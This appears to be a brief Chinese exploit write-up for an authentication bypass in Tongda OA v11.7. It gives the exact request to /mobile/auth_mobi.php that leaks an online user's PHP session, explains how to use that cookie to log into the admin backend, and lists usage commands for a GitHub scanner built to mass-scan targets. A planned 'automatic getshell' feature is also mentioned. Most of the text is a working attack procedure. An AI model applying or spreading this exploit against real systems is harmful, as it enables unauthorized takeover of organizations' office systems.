通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统
通达OA < v11.7
检测当前用户是否存在线
http://127.0.0.1/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
不在线
不在线显示 RELOGIN
在线
在线页面空白,但已拿到SESSION
设置Cookie可直接登录后台
http://127.0.0.1/general/index.php
https://github.com/S1xHcL/TongDa_Scan
# 指定 URL
python3 .\TongDa_Scan.py -u 127.0.0.1
# 指定 uid 进行扫描
python3 .\TongDa_Scan.py -u 127.0.0.1 -i 1
# 批量扫描,默认扫描UID为1
python3 .\TongDa_Scan.py -f ./list.txt
- 多线程,加快扫描速度
- 自动getshell